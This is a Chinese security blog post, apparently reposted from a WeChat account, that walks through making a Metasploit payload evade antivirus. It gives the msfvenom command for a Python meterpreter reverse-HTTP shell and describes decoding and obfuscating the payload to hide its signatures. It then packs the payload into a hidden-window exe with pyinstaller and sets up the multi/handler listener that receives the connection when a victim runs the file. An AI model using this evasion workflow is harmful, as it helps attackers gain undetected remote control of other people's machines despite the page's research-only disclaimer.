技术分享 | Msf免杀思路分享

admin 2022年8月7日00:36:03安全文章评论13 views625字阅读2分5秒阅读模式
技术分享 | Msf免杀思路分享


1

Part.1

首先


我们打开终端输入此项命令生成python文件用来上线MSF

msfvenom -p python/meterpreter_reverse_http LHOST=<IP> LPORT=<port> - f raw -o msf.py


然后我们打开py文件后可以看到py代码

技术分享 | Msf免杀思路分享


现在就可以复制里面的base64代码进行解密

技术分享 | Msf免杀思路分享


这样我们就拿到了里面的python代码内容

技术分享 | Msf免杀思路分享


然后我们就可以对python代码进行修改,加密,混淆等操作,来隐藏自己的特征

技术分享 | Msf免杀思路分享


这个呢就是我修改过后的⼀个python代码

然后呢我们就可以把代码打包为可执行文件尝试免杀效果了

pyinstaller -F -w msf.py


上面的pyinstaller是python打包的⼀个⼯具用来把python文件打包为exe的工具

-F参数就是生成单个可执行文件

-w参数就是不让其显示DOS窗又

然后就可以看到以下的信息

技术分享 | Msf免杀思路分享


我们现在进入dist文件夹下找到msf.exe文件

技术分享 | Msf免杀思路分享


2

Part.2

这就是我们的成品了哦



现在我们打开msf来连接

msfconsole



技术分享 | Msf免杀思路分享


紧接着依次输入下面命令

use exploit/multi/handlerset payload python/meterpreter_reverse_httpset lhost <IP>set lport <PORT>run



技术分享 | Msf免杀思路分享


此时目标机器运行我们的exe就会上线

技术分享 | Msf免杀思路分享


此时我们执行⼀些命令

技术分享 | Msf免杀思路分享



技术分享 | Msf免杀思路分享


THE

END


思路就分享到这里,大家也加油哈!

技术分享 | Msf免杀思路分享



原文始发于微信公众号(寻云安全团队):技术分享 | Msf免杀思路分享

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月7日00:36:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  技术分享 | Msf免杀思路分享 http://cn-sec.com/archives/1222861.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: